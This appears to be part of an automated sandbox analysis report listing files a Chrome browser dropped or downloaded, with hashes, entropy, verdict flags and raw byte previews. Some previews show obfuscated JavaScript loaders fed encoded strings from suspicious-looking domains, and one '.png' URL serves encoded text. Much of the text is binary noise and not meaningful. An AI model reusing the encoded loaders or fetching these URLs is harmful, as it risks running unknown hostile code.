                                                                                                                                                          Preview:.PNG........IHDR...D............L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.......{.s..<.4.(. .. $c!l!. ...w.......g...2...}.........8..e.o..$c...D.B(..&......W]SS...'u..v}f...v..r.9.{.R2.d..........z............z............t..T.I.T..H...&.C>..h.K..A.9..6.0.........*.........Ur[E.$.6...Q..T].T........-.m[.O.....c..(.<.l....].J(.....'K.!. ....... .Q....*..`.......5R...L;S4..g....G.......h.DDf.U..E..K...P.v.X....gTIDq.... .V...b.._>|.F....f.K..4....".U....T....~.....G..{Fn.,..w........1Z>.Z..X.9#... F..T...........z.I....-..l.M...B.V...8.L..kH.......m.0....s4.V.......K........e4....Sf.q.2S..A!P...Q. .%..@...?h.D.N.p.2'..oz,.... {...C...>.L..dLf.g......t..<S...../....b1..>Sw&...#_.+..5..$.....Y(.J.p8.x0.K>!....$....1...Cq>.."u.......*Xzr...3d......L1....e.k:..T."Q<:..r..,...B..X..e.. "..G.X.2.`0.W..m.....j...?....~Z.H..y../.....3........Z.?.V.....^}..%K.O..?.c.M_.RWuUU"..*B.C........g.......=T.hMp.eS.Wf..A.Q.........{...<.{L.......9.U%p.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 181 x 429, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):88636
                                                                                                                                                          Entropy (8bit):7.98559741202158
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:9mbjlSQNkR90Nt/591Z+1BoaWaqmQrj3cK3m6igB9lErUhO/BG6gYUrTkYzm:w3AE591Z+1aaWaqmQr7cuzHlEkOZ2YqI
                                                                                                                                                          MD5:8DE445F00E39ADA77A15ABC2E464A2B7
                                                                                                                                                          SHA1:D2C801E8DDC24ABC0431EC3756D3B8FD47D3A992
                                                                                                                                                          SHA-256:874FDB7EFD8F22683541ECC28184C5791F393531ED714A69614F799CDE0EBC83
                                                                                                                                                          SHA-512:F4AAB1141837B7091640DB97D91ECC5524AAF93776BACF865D245E0611E0AE98BF02E35D4FF4A629E9ECD72FE19FA59496ACC4A0491BF18F77081F9DD50FA8B3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............P.5.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.f.U..v8.7W.].9)'.....bl......8.m..##...Nx.s.....`...!...Z.:I......7....?.y..n.+.nI.yN.[7....k..].%x..g.m....;.......g....~.E4.:.h-...P..........8x.5..$.iq+....H.T\.7?X5.).h../.L...p..>.uz....H..?!...G.....b.y..~....r..(.m......*.a[..o.A.|.Q.{.{.y..@."...E\.....W.dx..-..9..0.@.x.[e..j.S....e..E>........l...........K4...I.I.....$..W.Q..X......y|w"o......./..}.y.?.._].}.M.......2.v.>.......V!2 *A......I.51_.O_.'.O.EbQX<,..(..B.Q[i.7p.\...#x........@.o..?#..u..Ma..6B?X......ny..O.o..@W....6.?.O.&.R......?.......g..{.....s?.1`.kn....|.S.W{}<v......Z.:..,...Vi....m....B......)$..b...........H~...l..?.....{.e7j......]2~........N.{o...SW6/./\|...N...u..^..2.?.oK..w.....?.....@.YU.D....|.J...._.N,.....CG.<..<........g_..R.....q.......-.....~.......k.[.g.V6..p.,M.Vw.;q.M~+.n....A.....?..N.....=....=z.....e....g...t......=...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 20 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1215
                                                                                                                                                          Entropy (8bit):6.608499131420182
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:2cy1he91Wwjx82lY2T3ouVDix4LyJ3VGE33JbGISUL1CgMrg92SLNVhM:zwqQNn2xeJ3pBNLLMk92SZVK
                                                                                                                                                          MD5:773E54B2F28126B703DB0C06B5C9AA8C
                                                                                                                                                          SHA1:98CA1D1F5047BBD53B3A0BA19A4D7B879A41A5C3
                                                                                                                                                          SHA-256:7A55CC563D83993FFE115E7D88478067DE0B4C7DBC34D6438F931FBB448771D7
                                                                                                                                                          SHA-512:8ED68F3409421F6982E2C4DD514CA9852AFE869860B0093B8AB0FE5001179A40C5C686479ADC2AFD9F697366475A7110C2B8DFAB7E533DDCAD34BA457F61ABBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/news/1.png
                                                                                                                                                          Preview:.PNG........IHDR..............._.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:35D82634F4DA11E6B853A75CCB293192" xmpMM:DocumentID="xmp.did:35D82635F4DA11E6B853A75CCB293192"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:35D82632F4DA11E6B853A75CCB293192" stRef:documentID="xmp.did:35D82633F4DA11E6B853A75CCB293192"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..@....3IDATx.b...?.........L..M,@...X.8..4...b.b.....! ....[.....\B.Z....0.*...[.8.Im....bY&.. .....$..?@...]@......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 333 x 81
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7889
                                                                                                                                                          Entropy (8bit):7.820180776642977
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:/BVsG7FkqNdcmt+SBoFo0LhgiuybWtp41JwCUsz:/BCGOq7/FyKiD6LCUsz
                                                                                                                                                          MD5:C5F1DB8A552E95F0B0F6B0A9FC59B93E
                                                                                                                                                          SHA1:7DDF31D81E285B78B0A2366546C69C10A66E3131
                                                                                                                                                          SHA-256:34684D52B7A18477268CF05F7560F4BA13D6A01B9948BFCA2AA7040469F7CA8F
                                                                                                                                                          SHA-512:381EA3AE974DDFD766134E35A8CB30BC46409CD53A38E9327DA82119DCBDC40B2EB4A979102CB18696987B8AEBBAFF37341B14380C3E515775543AE010A4F348
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/af5479f61b9c648fdb65957b6b3a813b.gif
                                                                                                                                                          Preview:GIF89aM.Q...........[..}!!!.....)vc;..(...O-..c....wF....y+..NsB.&&&......f9.........l.webA..W..wzuJ..(((..U..YU;..L.W.1.s...SMMKhY54.......O..w.w....S7&..V......74,..Z...E7%.u5GD3.........1..f...F..5..h....4.Y&..u.Y..... (.(.......K..K...a]B........(..9..zUL5.Q.G.r(.s..k:..Z..a..p...3.B......m....e'.zE.....KvZ'...hG$qmh..wokE..j.5.j..wV.P...:.!.w..._.}...b.c ..d.\.nE.|D.h..v...mTE,.{..wW;.....6,"..}.S..#.X...s?</..[..2.v(..4..N.L....*4JdS0.<." "%.Y.%%'-,).y$.U.@...<.p?.7...... M@*.'/*%..... ..."$'pM.(*4&$#..&X>...g...&"...............#.....!......$$$..........6.....L&.^B.......oX........k.(..jG...kk....88....Q6#....Y.....A8>A&..x......N....E}iP.}r....h6..i..Q'''.&\Z_fQ>`_]a1...0v.K..:......}..H..N...0.#.#.0..h.....#XWW......!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/199
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5406
                                                                                                                                                          Entropy (8bit):7.875836177006229
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mYzFqu2hiwWx/nqMtwje6LcBlKgEBkTnieTOzUXAaZFszy3d2FcOZQ:n3wWx/quw6VIMeiNZEQ
                                                                                                                                                          MD5:0828B6BE9143DDF7D21123D39FF5A13C
                                                                                                                                                          SHA1:008BE056809423055B06BB6705A5C8A990706ED1
                                                                                                                                                          SHA-256:767DCEC9219465104F17C5D75389DE4AE5EEC8ED85CDD4725C7684707F2C9C1D
                                                                                                                                                          SHA-512:E09959DFF2519DCAD30B07C4A1399E25B96183E29AA1CCB3173FF9A7C27C866D59EFBF072F1D85B5F3C807ABDB4BC7617E6CBEB5506575C77F849BA2947C1B71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_bg.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:0775CB5AF77811E8AE71AEF0D532570E" xmpMM:InstanceID="xmp.iid:0775CB59F77811E8AE71AEF0D532570E" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c5537c56-d66b-9f4a-95f4-82eac84c99bc" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<p....>IDATx..Z.t....o{..$!$a..a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 29 x 16
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1818
                                                                                                                                                          Entropy (8bit):7.248458028824761
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:rBf3rlmUY2vX9+XVff2GHmiMJ+tID61tCaA:rBfbEUY2MVfeGzMJ+uDcw
                                                                                                                                                          MD5:CA0DE4B71304AB21825549ECD5D7F60C
                                                                                                                                                          SHA1:0FFBADB83B7D392F1252F0758BD385DB0C5478BF
                                                                                                                                                          SHA-256:1E089BE0590E34B5911C2175CD3BF1C9CD04353E87234FB2E1F35DC37E982214
                                                                                                                                                          SHA-512:AC63802342C41D502647C4C82D5D2911D64AB2D74F3D55377EBC142CD30406AFE1337C2B7DACA3B350DC02F53E52AC2A03F76A5CE4B6D4B612A32C35739A254A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a.......................................f..p..o..n..k.}i...<..;..:..8..8..8..3..1..,..*..)..*.. .. ......}..L..K..E..0../..&..............................~..v..r..r..q..^..]..\..Z.}Y..`$._#.^#.^!.]!.]!.Y..X..T..R..R..Q..G..F..F..D.}C.L1.K1.E...00.0/./../-./-./-..(..&.,!.,..,..+..(..(..(..(.}(.L .K .E..0../..........................................~..|..x.}v.L<.K;.E7.0#./#.&........!..NETSCAPE2.0.....!.......,..........o@...H..R.9....rJE...Ku...@..R.*.%.s.....x.....8.....Juzdwyt.{.G.Y.\^PR.TWBD..IMO.#G.%....B!..(.....*..."..A.!.......,..........q...e\VQ.....\f..cR....c.~U...~_......Q...]X.........................X]..^..~......T....b....`QW}...ZY.......!.......,..........s...{H@=.....H|..O>....O.A...A.J......=...KD.........................DK..I..........B....N.AP...L=C...FE..M...!.......,..........p...7/,.....7..y-....y.1...1.:......,...93.........................39..8.........50.....1z...;,2...64..<...!.......,..........\.$..`.h.....j,..l......3@ (D
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):244
                                                                                                                                                          Entropy (8bit):5.493134443918007
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:4DAIUahDnTKsAxS8XF2Mcnkpc7uOC4FtJkJJ+VF2:4chWDTS/AJj2a2
                                                                                                                                                          MD5:15BAF69A62DFA1C33E0F14038B37FCF9
                                                                                                                                                          SHA1:E2BD028CB6F2A172C866DED6E35306F7AAB12867
                                                                                                                                                          SHA-256:159B053C9B86D8420AFCCC6D51BD380AEB3F0B0BCBB880085DAA7938ACA7844E
                                                                                                                                                          SHA-512:64C3157EA355A7E82320555201B4FE5257823EC8143DC3F395D9B23383DC7A96DBFD0787FB2AE15F32CB1FAE3FDE9C24DF34DF5892C330D7E1E2B9C068DF25CE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4044-otherConf-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgF0AaAbwCIBWAKwFcAXcgLgDNa0Z6BLdTEYgE7F6ASgq0kIAARJ6Arp3IBuAPJhqITgDoAJiBZc0IAAoCUEEAPoBPTEPIB9ByCQBZFDtoAbEOTIA3KC9aECYAQgAGAF8RYV07YnIYKAEdUxR/Lj0BAFEADxhgvT82Dm5eMQEQeloBNClaGKVAgQaAXmxyYAAvckIopqA=")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2160), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2160
                                                                                                                                                          Entropy (8bit):5.850311775041626
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VPP8EFi2KM3mhLcqh26DwqAKUM1/sX7yggai+T5g2uTq7LCYyRbGroBUb+XV8tzf:VPPtFmSzENUi6ygFHyzTq+Xg+Ez
                                                                                                                                                          MD5:A5613FFFF7A03CE82BAE38F746D0E8AD
                                                                                                                                                          SHA1:256DA0FBDDDD3D80DF55627476DD889E7E7D68F6
                                                                                                                                                          SHA-256:34935A62BB842C276C8C5A3BE353B276D78181A681B960F7F18C7BE124C0DCF2
                                                                                                                                                          SHA-512:B0F6803DC139C2626CFE794A3D3A7D51C8A4B155ED00F1EB4FD2F7301181DC74A858FE8EF18A01008FB4815824857226D7C994D8761F3D207116D9886BF5DC06
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/menu.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgBgE4BdAGgG8AiAVlwFcBLKgLgDN60YAXR9TNGW4BKCgF8yABQAmAGxjtOPPmgFCyIUVXpIQAAiTcATox5UA3AHkwAKxA8AdNJBtGaEJKMoIII9wCemNxkVAD6oSBIALIo0vSyIFSUAG5QsvQgLACEBGLC5qlGelAAvCCYVAQwEGxUwmSMJRQwKAC2EOggaNxILBStXfQAyvRgily8/KJGINz0Rmh6IA7luADMG8IO3AAWXZjLYG7SAvGyISgAagCOABp1wmIS0lDcUOPKUxQzcwsUaFBkn0nhIWu16NwQNI+gCBh9JqpprN5osoE4XFB4twHABVXiyBwDND0ABKKAhIAAclABkEdowkA4ACReCkOWGaJ5kAa7WK9CgAc1mUSgAA94SoBEjfosCCUSrsGezAYSxQB+AgsNAAH21isZAOSqtFEgZAGFZKY4BL+GhRIU9NwSkyBNsoEYhSIHK9jBUYLIoEgkHVzNwAGRh7HHECiyxsCoAIQAkpSACKhOoRl0AcmwjGkAD0SlQkKMooMMyQWMkGYwwAls1skJbnDisAAmAgER5kT0WqAALwHNtUdoojHjaAc+YjmCyU8thl1cvlC4Z2ISaAFu11VCiAFFKTjQmaADJJs0AaSoWXl+uVRv9g4HwmEPxRAHpMMm09qSZYcQAFX3ElhA/bZIm4V0nyHbYUDbHwjDNQNylfNUqFYNFnDYTFZGxBNjgcGCBwItATinfMe09EYwCTaEOAmSUx3fBY9DQNUpxmCAAxgcoPwAHQ/D8BRCDNhBYDCJE9AAJGY2BHKVvmRVisIxLEHFI6QHEtNA4E010djkx5QRmV4oQU+13TYhV6SQIQSmAY4UGABwhkvFNzHKKhcAAQRsAU6gqBwPyoABqbhQqoD9o1FBwbGDLZdn2BjPlUEQKAdEAFUJQYyFKF0qDAWJ/DqIigwqVo3AAWkc6RdlKrieL4
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 108 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2133
                                                                                                                                                          Entropy (8bit):7.490090340114487
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ZANn2N2D2iJ3urQrXv/gCSK57IsJPkI6Hhs/A:a2ojgCnlN6HOo
                                                                                                                                                          MD5:2785D329B3A6D8E6A82A6D8E8AB23351
                                                                                                                                                          SHA1:3B4898A16C174097742C086BCD616B4AC1833D19
                                                                                                                                                          SHA-256:01EB9FAEC1E6A393A5F29F516BC371A5BBFA620238A54802BA46FB4C571717B6
                                                                                                                                                          SHA-512:3C240234D574FD8A9C6072DE260FD7D2336CC4AF2C61F6E8B47477C331382F58E58D829FFA7B8A02BB524CD1EF8905D8A8593A27373CDF58B3AFA1F958B8E431
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...l..........N;|....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:AD630BE350A211E79D04F4DB96458C26" xmpMM:DocumentID="xmp.did:AD630BE450A211E79D04F4DB96458C26"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AD630BE150A211E79D04F4DB96458C26" stRef:documentID="xmp.did:AD630BE250A211E79D04F4DB96458C26"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.b...b@.......TkL.W..x...... 1FF...@5.P6.....0....FAp.A..?$*@ ..Q.Qj.....c.........0....`......`...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2220), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2220
                                                                                                                                                          Entropy (8bit):5.984825387840026
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:b9MlsWShLTqzoppa5TlIVZjzoaBUzHQajzpqSiNwRNtF:RFcop2+VZgauTjzgSiSzf
                                                                                                                                                          MD5:D1C75C04029D3D7FFDB977C39DEB00E2
                                                                                                                                                          SHA1:5EBF0599C507F29CEFA3C944DD7DF7E03E5AD412
                                                                                                                                                          SHA-256:371843FC64AEE24FD05A5752AC8DCF4876254B850D90051DBD5A2712F52D4B2E
                                                                                                                                                          SHA-512:8C19391E830F5EA2E75F6D712F1716159BD7F97AC8BC9CEFFCD27CDE0A5B431866FF9EAD58A00245B8688DF5DB473915C721C5CE8F96CCEBE7276DA310E42AD6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/fiximg/ac-20200404/fileupload/uy09/202307/202307200237350.png
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164Nm+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkb6nL57MazCDRQIPbGO2hAdYGuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Sft8Yd0Kvsat1SE0rp+oeHXoY/+8ZQFbnTiJHTA5QbDWsuGXGhsTYmFkNa5Hv3H7usyy6PGcu5HlCvfGJNreMnPnVnRUVFaDMSYEL3mPeKCISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNunXBUC3skW0M/g1mB0ijVD2O7FqvtgboJkfLJmLi2XrUwkGEVh2mLIIc/cEFD31K3hYqSSyqwZY8c7NZJ6vOBwOJTtr4xsYc2eKgQEaAgHOjNplfY22h1jJEvXdnHcpwcvd5hE4JC5lpQb4zw7lJmRf8+qpmBDvbFJ68PThgh4zOFWJcJdc8LWvEqKXCm45JSzGqAQd6rF9DoFnC7YMAq99M7eNc9Y8vViorjw7NZqOtaRlCGZAuRqRlLVu+dZiynDuzSoEuHP09yM4ANS+S4zVrsW+udy9/eofYQfLuvhp8vhPM5F1VcQZZVrdlVM1d20nKSrkGMsB4a7+Mm7AESMOi7pxmXjqzTdXppHo5
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 123 x 38, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6965
                                                                                                                                                          Entropy (8bit):7.958696461919612
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ZwTmSjEWxIxiLj7TBnV39+jc9u0lcWDy1vvYVz:eGxYvMjBcnyIz
                                                                                                                                                          MD5:EC573D935ADB87DFEB615ED31EDAF32D
                                                                                                                                                          SHA1:0D5C777CF25633DEE27010FCB355CB22240623C1
                                                                                                                                                          SHA-256:2743C6B7A62003DF9A2BBA31FF2DF460A23A2945815ED711CEC4018070446B0F
                                                                                                                                                          SHA-512:F17C9612B1B9F9EEDAA062E6045ED70748CDFAE17C1C3E1BF45B481064D2C2EE2613BAB6BA5737DA1368B10A17908340D29E872C2F2BFE5190B84844F47884DF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/footer/b03.png
                                                                                                                                                          Preview:.PNG........IHDR...{...&........V....IDATx^.{{lc.y.w.....3.....RM..M...I.F. T.l.F.Z.4~da.d..g.)R.H^..KI3...N,.i....b..0.....@S4.X....*.u.x_C.$.>...E=f4........(].{.9......xH..W...?.<.v.......o...YjD.'...Mg.ac=.....9j..Tf.F....a?..M..D.O=3.|.z'.Z<....z..8..SpE........O@..q=r.G.}.R.o...D..N..m.<x....N.......L.......b.. .....=..GGM.k.s..'t...O.h..d....7Mb...O.g...d..o.C....so^.....N.;...Ls..u..}..G.7..........J.Z.7~R...(85W..T..G}.`?....u.q...?.l.....sy=...6).K.N..........On.2.1#.7....X.3....~?.{.3.bu9.F.0...Jf.R.{..@..`.&.... e.p..v.^...l.W.Ob.|...........3.8........... ..b..4.*.3..@i...L.+%. .u.N.x........~V...~..w..1..B.0..uT.u...HV..G..f.q#....PJ.....3...Z.o(..juz...N_r..{._...[1...............R...y....[.0.$b.o.....x.....ygn#.k..j.a.f.&.>qpl....#....x.ya.u.......se..3...&J.+..a..V..[..)6......T....3,...8(....Db1.....k...wi.....8...OLGl...[..l....J=)B...t.Q..}......[.b.zyJ3k.4.1..(..hIPp.M.,]u.>...?..E"#..\.'.)s<.....]._.E.x........#'_
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16228
                                                                                                                                                          Entropy (8bit):5.053983434030325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:g9UztP6/SOOmz6C5ckwgaCPrXfiAbwJuKejbMFo/z95N0Db23//70Lonier:g9UU/fOmzwCTX+er
                                                                                                                                                          MD5:1AD1EE321134B2A6630D60F75DF1F7A2
                                                                                                                                                          SHA1:5E64551B37AD207037A884091FA66EBE8183AC2E
                                                                                                                                                          SHA-256:E93D060958E7643D5005229C5BBA7AD7B4E40E8C912B06609876729871C4E42E
                                                                                                                                                          SHA-512:9C1178DB50353F24E7B551ED98D016AFE15372C7F841BC0C3F268C67E04592372AA6BC55FED7AEE624F25BEF24446A0205ACAEDC8A0964E81B9EA2AC23D4E869
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://stt-wasm.ai4funs.com/wasm_exec.js
                                                                                                                                                          Preview:// Copyright 2018 The Go Authors. All rights reserved..// Use of this source code is governed by a BSD-style.// license that can be found in the LICENSE file..//.// This file has been modified for use by the TinyGo compiler...(() => {..// Map multiple JavaScript environments to a single common API,..// preferring web standards over Node.js API...//..// Environments considered:..// - Browsers..// - Node.js..// - Electron..// - Parcel...if (typeof global !== "undefined") {...// global already exists..} else if (typeof window !== "undefined") {...window.global = window;..} else if (typeof self !== "undefined") {...self.global = self;..} else {...throw new Error("cannot export Go (neither global, window nor self is defined)");..}...if (!global.require && typeof require !== "undefined") {...global.require = require;..}...if (!global.fs && global.require) {...global.fs = require("fs");..}...const enosys = () => {...const err = new Error("not implemented");...err.code = "ENOSYS";...return err
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
